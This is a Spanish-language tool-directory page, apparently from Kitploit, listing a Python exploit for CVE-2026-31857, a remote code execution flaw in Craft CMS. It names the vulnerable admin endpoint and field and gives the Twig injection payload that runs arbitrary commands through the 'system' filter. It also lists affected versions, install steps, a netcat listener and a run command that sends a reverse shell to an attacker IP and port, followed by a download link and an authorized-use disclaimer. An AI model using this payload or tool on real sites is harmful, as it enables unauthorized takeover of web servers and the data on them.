Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31857 — Craft CMS RCE mediante condicionales relacionales en el panel de control | Kitploit
Herramientas/GitHubGitHub/0xtatsuki/cve-2026-31857
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS RCE mediante condicionales relacionales en el panel de control

hace 1 díaAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-31857 - Exploit de RCE en Craft CMS

Exploit en Python para una vulnerabilidad de RCE en el panel de administración de Craft CMS, activada a través del endpoint admin/actions/element-indexes/count-elements. La inyección se realiza a través del campo elementIds de una condición RelatedToConditionRule, que es interpretada como Twig en el lado del servidor y explotada mediante el filtro system para ejecutar un comando arbitrario ({{[['<cmd>']|filter('system')]}}).

Vulnerabilidad divulgada por NeoSprings

Versiones afectadas :

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

Referencias :

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

Instalación

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

Uso

  1. Inicie el listener antes de ejecutar el exploit :
$ nc -lvnp <attacker_port>
  1. Ejecute el exploit :
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y para ejercicios autorizados (CTF, pruebas de penetración contratadas o pruebas locales). Usarla contra cualquier sistema sin autorización explícita es ilegal.

Descargar herramienta